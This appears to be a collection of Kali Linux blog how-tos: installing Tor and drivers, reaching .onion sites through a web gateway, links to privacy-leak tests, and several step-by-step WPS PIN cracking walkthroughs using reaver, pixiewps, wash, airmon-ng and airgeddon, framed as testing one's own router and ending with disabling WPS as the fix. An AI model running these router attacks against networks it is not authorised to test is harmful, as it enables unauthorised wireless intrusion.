INSTALL TOR ON KALI
Quick How-To install Tor
Open a terminal
sudo apt update
sudo apt install -y tor torbrowser-launcher
torbrowser-launcher
Thats it!
Kali Linux / Backtrack Information, How-To’s, Tips, Tools, and Guides
Quick How-To install Tor
Open a terminal
sudo apt update
sudo apt install -y tor torbrowser-launcher
torbrowser-launcher
Thats it!
Open a terminal
sudo apt-get update
sudo apt-get upgrade
ifconfig
Note your wireless adapters…if any are installed
lsusb
Note the USB devices on the pi. You will not see the ALFA wifi device
Next type
sudo apt-get install realtek-rtl88xxau-dkms
Drivers will install, this may take a few minutes.
Once it is done type the following
lsusb
You will now see the Realtek Adapter
ifconfig
You will now see your ALFA wireless card
I have run into a situation where I need to find a file named zip.html and change it to download.zip on several hundred files.
To do so, I simply need to run the following from the command line as root
find . -type f -name zip.html -execdir mv zip.html download.zip \;
While TOR is the recommended way to access the dark web, everyone and anyone can still visit without the same level of anonymity. I certainly would suggest using TOR always, however if you need to get to any .onion site from a computer without tor, you can do so by following this:
Open an internet browser (Edge, Firefox, Chrome, etc)
Type in the .onion site (ex. https://protonirockerxow.onion/rc/)
After the .onion portion of the address, add .dog (ex https://protonirockerxow.onion.dog/rc/)
Press Enter
You are now viewing RISEUP’s website on the darkweb, using a regular browser
How much information are you exposing on the internet? Check out the links below to find out more….
IP v4 Address Leaks
https://ipleak.net
https://nordvpn.com/what-is-my-ip/
https://browserleaks.com/ip
IP v6 Address Leaks
https://ipv6leak.com
DNS Leak
https://dnsleak.com/
https://www.dnsleaktest.com/
Browser Leaks
https://browserleaks.com/
Email Leaks
https://emailipleak.com/
Java Leaks
https://browserleaks.com/javascript
Canvas Fingerprinting
https://browserleaks.com/canvas
WebGL Testing
https://browserleaks.com/webgl
SSL Client Test
https://browserleaks.com/ssl
Geolocation Testing
https://browserleaks.com/geo
And SOOOOO Much More
https://browserleaks.com/#more
On your Kali box, you will want to go to the AMD Driver download page for the RX 480 Cards
Once there you will want to download the UBUNTU Drivers
After the download completes, open a Terminal
Navigate to the directory where you downloaded the drivers and type
tar -xJvf amd(AND THE REST OF THE NAME OF THE FILE)
cd to the amd driver directory
nano amdgpu-pro-install
ctrl +w and search for ubuntu
After the ubuntu | linuxmint | debian text, insert | kali
So the line will look like
ubuntu | linuxmint | debian | kali
Save the file and exit
Type the following to install the drivers, and it should go through now. If you encounter any errors, you may need to repair and reinstall the drivers
./amdgpu-pro-install -y –opencl=legacy
sudo nano /etc/apt/sources.list
Add the following if they are not already in the file:
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
Save and Exit the File
sudo apt-get update
Your packages should now be available
Run this from a linux box, against your network. Do not run this against any other network out there. It is easy to find the attacker, it is easy to prosecute the bad actor. Be very careful with this attack.
I would suggest installing Ubuntu, Kali, or ParrotOS and running from a USB drive, connected to your computer or laptop.
Open a termina
sudo bash
apt-get update
apt-get upgrade
apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x/
cd src/
./configure
make
make install
airmon-ng check kill
airmon-ng start wlan1
‘wash -i {monitor-interface}’
Identify your target (YOUR NETWORK ONLY) and note the name, bssid and channel. Make sure the signal is strong
reaver -i wlan1 -b {BSSID of router} -c {router channel} -vvv -K 1 -f
Your attack is now running
Open a terminal
sudo bash
mkdir /tools & cd /tools
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
ls
sudo bash
./airgeddon.sh
apt-get install and name of tool thats missing
After the dependencies are all installed, run ./airgeddon.sh and begin the configuration
Select your wireless card
Put wireless card into monitoring mode
Select WPS attacks menu – option 8
Select option 4
Select 2.4 ghz
First you will want to download and install reaver, wash and airmon-ng. If you are running Kali or Parrot, it is already there. You will also need a wireless adapter that is capable of packet injection. Assuming you have those, you will want to open a terminal and run the following
sudo bash
ifconfig
Note which adapter is your wireless card, that is capable of packet injection. For the rest of this, lets assume it is wlan0.
airmon-ng check kill
wash -i wlan0
Note the BSSID of your Wireless Access Point / Wireless Router
reaver -i wlan0 -b MacAddressOfMyRouter -vv
After some time my router/ap gave up the ghost. It showed my WPS pin. I am running a wireless router with a Broadcom chip, which is susceptible.
To fix this, I had to log into my wireless router, navigate to the WPS settings, and I changed it from Enabled to Disabled. I saved the settings, and voila…I haven’t been able to crack the WPS pin again